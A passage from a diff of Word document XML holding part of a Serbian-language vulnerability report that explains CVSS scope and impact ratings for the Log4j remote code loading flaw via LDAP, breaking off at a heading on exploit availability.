+        <w:t>nije</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>potrebna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>iterakcija</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>drugog</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>korisnika</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>S:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Iskorišćena</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ranjivost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>može</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>uticati</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>resurse</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>kojima</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>upravlja</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>viši</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>sigurnosni</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>autoritet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. U </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ovom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>slučaju</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ranjiva</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>komponenta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>pogođena</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>komponenta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>različite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>obe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>su</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>upravlja</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ne</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> od </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>strane</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>različitih</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>sigurnosni</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>h</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>autoritet</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">C:H- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dolazi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>potpunog</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>gubitna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>pouzdanosti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">I:H- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>potpun</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>gubitak</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>intigriteta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">A:H- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>potpun</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>gubitak</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:bCs/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dostupnosti</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Opravdanje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>vecina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> java </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>aplikacija</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ukljucujuci</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>hadoop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>koriste</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Log4j. ova </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>ranjivost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> je </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dosta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>fleksibilna</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>sto</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dozvoljava</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>dobijanje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>izvrsavanje</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>tudjeg</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>koda</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>iz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>lokalnog</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>udaljene</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LDAP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>servere</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>druge</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>protokole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:pict w14:anchorId="1BAD80CF">
+          <v:rect id="_x0000_i1032" style="width:468pt;height:1.2pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>Dostupnost</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:lang w:val="en"/>
+        </w:rPr>
+        <w:t>eksploita</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="10"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="en"/>
+        </w:rPr>
+      </w:pPr>
